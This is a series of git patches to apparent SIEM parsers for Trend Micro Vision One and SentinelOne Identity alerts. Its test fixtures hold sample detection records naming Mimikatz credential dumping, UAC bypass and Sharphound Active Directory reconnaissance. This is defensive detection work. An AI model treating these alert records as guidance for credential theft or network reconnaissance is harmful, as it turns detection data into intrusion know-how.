 .../trend-micro-vision-one/tests/test_service_abuse.json | 3 ++-
 8 files changed, 15 insertions(+), 8 deletions(-)
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
index 988fe612e..d672e2a64 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml
+++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml
@@ -36,7 +36,7 @@ stages:
 rule.name: "{{parsed_event.message.model}}"
 rule.id: "{{parsed_event.message.model.modelId}}"
- event.url: "{{parsed_event.message.model.workbenchLink}}"
+ event.url: "{{parsed_event.message.workbenchLink}}"
 event.action: "{{ (parsed_event.message.indicators | selectattr('field', '==', 'actResult') | first).value }}"
 - set:
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
index e503353f1..53813871b 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
@@ -13,7 +13,8 @@
 "reason": "Eicar Test File Detection",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
 },
 "@timestamp": "2024-11-26T16:51:29Z",
 "file": {
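Review bot: The context line `rule.id: "{{parsed_event.message.model.modelId}}"` has the same wrong shape as the `event.url` path this commit corrects: in the eicar fixture `model` is the string `"Eicar Test File Detection"` and `modelId` is a top-level key, so `rule.id` presumably resolves to nothing today just as `event.url` did. Changing it to `rule.id: "{{parsed_event.message.modelId}}"` in this same commit, and pinning the resulting value in the fixtures the way `event.url` is pinned here, would close the gap. The `set` action starts before the hunk.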
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
index 4d60422b4..edbe26be4 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
@@ -12,7 +12,8 @@
 "reason": "Potential Information Gathering",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
 },
 "@timestamp": "2024-11-26T16:48:06Z",
 "host": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
index 5b8dbfc95..d15f28c6f 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
@@ -12,7 +12,8 @@
 "reason": "Internal Network Scanner",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509"
 },
 "@timestamp": "2024-07-23T14:46:11Z",
 "file": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json
index 9a41ea92c..3c77d1afd 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_process.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json
@@ -12,7 +12,8 @@
 "reason": "Credential Dumping via Mimikatz",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://THE_WORKBENCH_URL"
 },
 "@timestamp": "2022-09-06T02:49:30Z",
 "file": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
index dbeed8e8e..a95ac7fc8 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
@@ -12,7 +12,8 @@
 "reason": "Process Injection from Windows Temporary Location to System32",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=0c12e642ca5b7ed4436e5f23f568ae10066608d3"
 },
 "@timestamp": "2024-07-23T07:49:48Z",
 "host": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
index 61b294270..6598afe24 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_registry.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json
@@ -12,7 +12,8 @@
 "reason": "Privilege Escalation via UAC Bypass",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://THE_WORKBENCH_URL"
 },
 "@timestamp": "2022-09-06T02:49:31Z",
 "container": {
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
index e3283fe41..a9a7d3d7c 100644
--- a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
+++ b/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
@@ -12,7 +12,8 @@
 "reason": "Possible Web Service Abuse",
 "type": [
 "info"
- ]
+ ],
+ "url": "https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000"
 },
 "@timestamp": "2024-11-26T16:45:28Z",
 "action": {
From f27eab62f8c6c3b3437d951d4e9608aef80ffa05 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc
Date: Mon, 2 Dec 2024 10:00:00 +0100
Subject: [PATCH 302/317] refactor(TrendMicro): change the name of the format
---
 .../CHANGELOG.md | 0
 .../_meta/fields.yml | 0
 .../_meta/logo.png | Bin
 .../_meta/manifest.yml | 5 +++--
 .../_meta/smart-descriptions.json | 0
 .../ingest/parser.yml | 2 +-
 .../tests/test_eicar_test_file_detection.json | 0
 .../tests/test_information_gathering.json | 0
 .../tests/test_internal_network_scanner.json | 0
 .../tests/test_process.json | 0
 .../tests/test_project_injection.json | 0
 .../tests/test_registry.json | 0
 .../tests/test_service_abuse.json | 0
 13 files changed, 4 insertions(+), 3 deletions(-)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/CHANGELOG.md (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/fields.yml (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/logo.png (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/manifest.yml (73%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/_meta/smart-descriptions.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/ingest/parser.yml (99%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_eicar_test_file_detection.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_information_gathering.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_internal_network_scanner.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_process.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_project_injection.json (100%)
 rename Trend Micro/{trend-micro-vision-one => 
trend-micro-vision-one-workbench}/tests/test_registry.json (100%)
 rename Trend Micro/{trend-micro-vision-one => trend-micro-vision-one-workbench}/tests/test_service_abuse.json (100%)
diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/CHANGELOG.md
rename to Trend Micro/trend-micro-vision-one-workbench/CHANGELOG.md
diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/_meta/fields.yml
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/fields.yml
diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/_meta/logo.png
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/logo.png
diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml
similarity index 73%
rename from Trend Micro/trend-micro-vision-one/_meta/manifest.yml
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml
index da8360194..014352012 100644
--- a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml
+++ b/Trend Micro/trend-micro-vision-one-workbench/_meta/manifest.yml
@@ -1,11 +1,12 @@
 uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e
 automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05
 automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6
-name: Trend Micro Vision One [BETA]
-slug: trend-micro-vision-one
+name: Trend Micro Vision One Workbench Alerts [BETA]
+slug: trend-micro-vision-one-workbench-alerts
 description: >-
 Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation.
+ This intake format will ingest Workbench Alerts from Trend Micro Vision One.
 data_sources:
 Process monitoring:
diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json
rename to Trend Micro/trend-micro-vision-one-workbench/_meta/smart-descriptions.json
diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
similarity index 99%
rename from Trend Micro/trend-micro-vision-one/ingest/parser.yml
rename to Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
index d672e2a64..f5859582b 100644
--- a/Trend Micro/trend-micro-vision-one/ingest/parser.yml
+++ b/Trend Micro/trend-micro-vision-one-workbench/ingest/parser.yml
@@ -1,4 +1,4 @@
-name: trend-micro-vision-one
+name: trend-micro-vision-one-workbench
 ignored_values: []
 pipeline:
 - name: parsed_event
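Review bot: The manifest's new `slug: trend-micro-vision-one-workbench-alerts` no longer matches the parser's new `name: trend-micro-vision-one-workbench` or the renamed directory, whereas before this commit `slug` and the parser `name` were both `trend-micro-vision-one`; if the slug is what resolves the parser, the rename breaks that link. Either align them (`slug: trend-micro-vision-one-workbench`) or record in the commit message why the two are meant to diverge. The format `uuid` is unchanged, so uuid-based references should survive, but anything that addresses the format by slug may still need updating — worth confirming.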
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_eicar_test_file_detection.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_eicar_test_file_detection.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_information_gathering.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_information_gathering.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_internal_network_scanner.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_process.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_process.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_project_injection.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_project_injection.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_project_injection.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_registry.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_registry.json
diff --git a/Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json b/Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json
similarity index 100%
rename from Trend Micro/trend-micro-vision-one/tests/test_service_abuse.json
rename to Trend Micro/trend-micro-vision-one-workbench/tests/test_service_abuse.json
From da65007e11116a5b5a457a097df379c56cd4d66b Mon Sep 17 00:00:00 2001
From: vg-svitla <131353512+vg-svitla@users.noreply.github.com>
Date: Mon, 2 Dec 2024 15:24:03 +0200
Subject: [PATCH 303/317] Update SentinelOne/identity/_meta/manifest.yml
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Co-authored-by: Sébastien Quioc
---
 SentinelOne/identity/_meta/manifest.yml | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/SentinelOne/identity/_meta/manifest.yml b/SentinelOne/identity/_meta/manifest.yml
index 1d18ad943..e8b52a2d5 100644
--- a/SentinelOne/identity/_meta/manifest.yml
+++ b/SentinelOne/identity/_meta/manifest.yml
@@ -1,6 +1,8 @@
 uuid: b502e522-6996-4b12-9538-f69326b68243
-name: SentinelOne Singularity Identity
+name: SentinelOne Singularity Identity [ALPHA]
 slug: sentinelone-singularity-identity
+automation_connector_uuid: 2d772558-821d-4663-87bd-af28bbb8415a
+automation_module_uuid: ff675e74-e5c1-47c8-a571-d207fc297464
 description: >-
 SentinelOne Singularity Identity is a cybersecurity solution that provides identity protection and zero-trust security by continuously monitoring and analyzing user behaviors to detect and prevent potential threats.
From c97f9cc3ebe0cc7aa224c75fb383f2bbbb3ff18e Mon Sep 17 00:00:00 2001
From: vg-svitla
Date: Mon, 2 Dec 2024 17:26:30 +0200
Subject: [PATCH 304/317] Fix comments
---
 SentinelOne/identity/tests/test_alert_16.json | 47 -------------------
 SentinelOne/identity/tests/test_alert_2.json | 31 ++++++++++--
 2 files changed, 28 insertions(+), 50 deletions(-)
 delete mode 100644 SentinelOne/identity/tests/test_alert_16.json
diff --git a/SentinelOne/identity/tests/test_alert_16.json b/SentinelOne/identity/tests/test_alert_16.json
deleted file mode 100644
index 0a9dc292d..000000000
--- a/SentinelOne/identity/tests/test_alert_16.json
+++ /dev/null
@@ -1,47 +0,0 @@
-{
- "input": {
- "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}"
- },
- "expected": {
- "message": "{\"id\": \"01935310-dc47-75de-8925-5f026bd5a705\", \"name\": \"LDAP Search Detected\", \"description\": \"This events is raised when a LDAP search Query is detected from the endpoint.\", \"detectedAt\": \"2024-11-22T08:45:50.000Z\", \"attackSurfaces\": [\"IDENTITY\"], \"detectionSource\": {\"product\": \"Identity\"}, \"status\": \"NEW\", \"assignee\": null, \"classification\": \"ENUMERATION\", \"confidenceLevel\": \"MALICIOUS\", \"firstSeenAt\": \"2024-11-22T08:45:50.000Z\", \"lastSeenAt\": \"2024-11-22T08:45:50.000Z\", \"process\": {\"cmdLine\": \"Sharphound.exe\", \"file\": {\"path\": \"c:\\\\users\\\\administrator\\\\desktop\\\\ad_recon\\\\sharphound.exe\", \"sha1\": null, \"sha256\": \"61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863\", \"md5\": null}, \"parentName\": null}, \"result\": null, \"storylineId\": null}",
- "event": {
- "category": "intrusion_detection",
- "end": "2024-11-22T08:45:50Z",
- "kind": "alert",
- "provider": "Identity",
- "reason": "This events is raised when a LDAP search Query is detected from the endpoint.",
- "start": "2024-11-22T08:45:50Z",
- "type": "info"
- },
- "@timestamp": "2024-11-22T08:45:50Z",
- "observer": {
- "product": "Singularity Identity",
- "vendor": "SentinelOne"
- },
- "process": {
- "command_line": "Sharphound.exe",
- "executable": "c:\\users\\administrator\\desktop\\ad_recon\\sharphound.exe",
- "hash": {
- "sha256": "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
- },
- "name": "sharphound.exe"
- },
- "related": {
- "hash": [
- "61F897ED69646E0509F6802FB2D7C5E88C3E3B93C4CA86942E24D203AA878863"
- ]
- },
- "sentinelone": {
- "identity": {
- "attackSurfaces": [
- "IDENTITY"
- ],
- "classification": "ENUMERATION",
- "confidenceLevel": "MALICIOUS",
- "id": "01935310-dc47-75de-8925-5f026bd5a705",
- "name": "LDAP Search Detected",
- "status": "NEW"
- }
- }
- }
-}
\ No newline at end of file
diff --git a/SentinelOne/identity/tests/test_alert_2.json b/SentinelOne/identity/tests/test_alert_2.json
index 39420a5e0..0a9dc292d 100644
--- a/SentinelOne/identity/tests/test_alert_2.json
+++ b/SentinelOne/identity/tests/test_alert_2.json
@@ -1,21 +1,46 @@ { "input": { - "message": "{\n \"uuid\": \"c0d4da63-0b2b-41ea-8cfe-0eb6bf78c398\",\n \"lastMigration\": 33,\n \"name\": \"Mocked api\",\n \"endpointPrefix\": \"\",\n \"latency\": 0,\n \"port\": 3000,\n \"hostname\": \"\",\n \"folders\": [\n {\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\",\n \"name\": \"user\",\n \"children\": [\n {\n \"type\": \"route\",\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\"\n }\n ]\n }\n ],\n \"routes\": [\n {\n \"uuid\": \"b071b344-f505-4b3b-ab48-963913a8f733\",\n \"type\": \"http\",\n \"documentation\": \"Creates new user\",\n \"method\": \"post\",\n \"endpoint\": \"user\",\n \"responses\": [\n {\n \"uuid\": \"0a1cd03e-8140-42cb-a0a3-67e99f44b595\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"w34k\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"CreateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"2334411e-b9c5-425e-8bd8-470da7d11077\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n 
\"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"654ef4ca-727f-48f6-8561-5a1a73bd80d7\",\n \"type\": \"http\",\n \"documentation\": \"Logout\",\n \"method\": \"post\",\n \"endpoint\": \"user/logout\",\n \"responses\": [\n {\n \"uuid\": \"8e9bafc8-78e5-4685-88cd-3b90f85edb87\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"b05bcbda-d9b1-4bf1-89ae-f4161426251b\",\n \"type\": \"http\",\n \"documentation\": \"Authenticate user with credentials\",\n \"method\": \"post\",\n \"endpoint\": \"user/authenticate\",\n \"responses\": [\n {\n \"uuid\": \"91ecae5f-67e0-4264-b724-964d54d7d458\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$\",\n \"value\": \"AuthenticateUserRequest\",\n \"invert\": false,\n \"operator\": \"valid_json_schema\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"6e78ae1f-c46c-43fc-a96b-6718ec506d26\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n 
\"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"8ac42783-a83d-4f6a-98ff-f76b7660e585\",\n \"type\": \"http\",\n \"documentation\": \"Refresh Session\",\n \"method\": \"post\",\n \"endpoint\": \"user/refresh-session\",\n \"responses\": [\n {\n \"uuid\": \"5505a95b-80d0-46cc-b388-9d5afac52102\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"DATABUCKET\",\n \"filePath\": \"\",\n \"databucketID\": \"77fk\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": true,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n },\n {\n \"uuid\": \"7d54557c-5d32-44c1-92dc-a594615ce7d8\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": false,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\",\n \"type\": \"http\",\n \"documentation\": \"Auth required\",\n \"method\": \"all\",\n \"endpoint\": \"*\",\n \"responses\": [\n {\n \"uuid\": \"c49cf55f-b651-4a26-9c10-9806af40c0c4\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 401,\n \"label\": \"\",\n \"headers\": 
[],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"header\",\n \"modifier\": \"funfy-auth-token\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user\",\n \"invert\": true,\n \"operator\": \"equals\"\n },\n {\n \"target\": \"path\",\n \"modifier\": \"\",\n \"value\": \"/user/authenticate\",\n \"invert\": true,\n \"operator\": \"equals\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"a4bc1f9a-cad0-416a-99a0-0202b1ccbe34\",\n \"type\": \"http\",\n \"documentation\": \"RefreshToken is required\",\n \"method\": \"all\",\n \"endpoint\": \"user/*\",\n \"responses\": [\n {\n \"uuid\": \"e5d4e8a4-037e-4e72-b8a3-1e4b9c5da3bd\",\n \"body\": \"{}\",\n \"latency\": 0,\n \"statusCode\": 400,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [\n {\n \"target\": \"body\",\n \"modifier\": \"$.refreshToken\",\n \"value\": \"\",\n \"invert\": false,\n \"operator\": \"null\"\n }\n ],\n \"rulesOperator\": \"AND\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": \"FALLBACK\",\n \"streamingMode\": null,\n \"streamingInterval\": 0\n },\n {\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\",\n \"type\": \"http\",\n \"documentation\": \"\",\n \"method\": \"get\",\n \"endpoint\": \"test\",\n \"responses\": [\n {\n \"uuid\": \"acc619a1-6ec7-45a6-888c-a7a860ed237b\",\n \"body\": \"{\\n \\\"message\\\": \\\"route required auth\\\"\\n}\",\n \"latency\": 0,\n \"statusCode\": 
200,\n \"label\": \"\",\n \"headers\": [],\n \"bodyType\": \"INLINE\",\n \"filePath\": \"\",\n \"databucketID\": \"\",\n \"sendFileAsBody\": false,\n \"rules\": [],\n \"rulesOperator\": \"OR\",\n \"disableTemplating\": false,\n \"fallbackTo404\": false,\n \"default\": true,\n \"crudKey\": \"id\",\n \"callbacks\": []\n }\n ],\n \"responseMode\": null,\n \"streamingMode\": null,\n \"streamingInterval\": 0\n }\n ],\n \"rootChildren\": [\n {\n \"type\": \"route\",\n \"uuid\": \"2be5e000-c494-4e86-abfa-7e736ccec3af\"\n },\n {\n \"type\": \"folder\",\n \"uuid\": \"b429b3e6-d7b1-4d4f-95fa-6ef0e9125858\"\n },\n {\n \"type\": \"route\",\n \"uuid\": \"dd9329aa-3b68-4907-b069-52d1d1793ca8\"\n }\n ],\n \"proxyMode\": false,\n \"proxyHost\": \"\",\n \"proxyRemovePrefix\": false,\n \"tlsOptions\": {\n \"enabled\": false,\n \"type\": \"CERT\",\n \"pfxPath\": \"\",\n \"certPath\": \"\",\n \"keyPath\": \"\",\n \"caPath\": \"\",\n \"passphrase\": \"\"\n },\n \"cors\": true,\n \"headers\": [\n {\n \"key\": \"Content-Type\",\n \"value\": \"application/json\"\n },\n {\n \"key\": \"Access-Control-Allow-Origin\",\n \"value\": \"*\"\n },\n {\n \"key\": \"Access-Control-Allow-Methods\",\n \"value\": \"GET,POST,PUT,PATCH,DELETE,HEAD,OPTIONS\"\n },\n {\n \"key\": \"Access-Control-Allow-Headers\",\n \"value\": \"Content-Type, Origin, Accept, Authorization, Content-Length, X-Requested-With\"\n }\n ],\n \"proxyReqHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"proxyResHeaders\": [\n {\n \"key\": \"\",\n \"value\": \"\"\n }\n ],\n \"data\": [\n {\n \"uuid\": \"38fb975d-c6f0-48d9-ae52-9e3fbc5cb654\",\n \"id\": \"8wey\",\n \"name\": \"Globals\",\n \"documentation\": \"\",\n \"value\": \"\"\n },\n {\n \"uuid\": \"2372a308-c890-479c-a18b-54abe4696967\",\n \"id\": \"zzay\",\n \"name\": \"ISODate\",\n \"documentation\": \"Datetime shared format comes from backend\",\n \"value\": \"\\\"{{now 'yyyy-MM-dd\\\\'T\\\\'HH:mm:ss\\\\'Z\\\\''}}\\\"\"\n },\n {\n \"uuid\": 
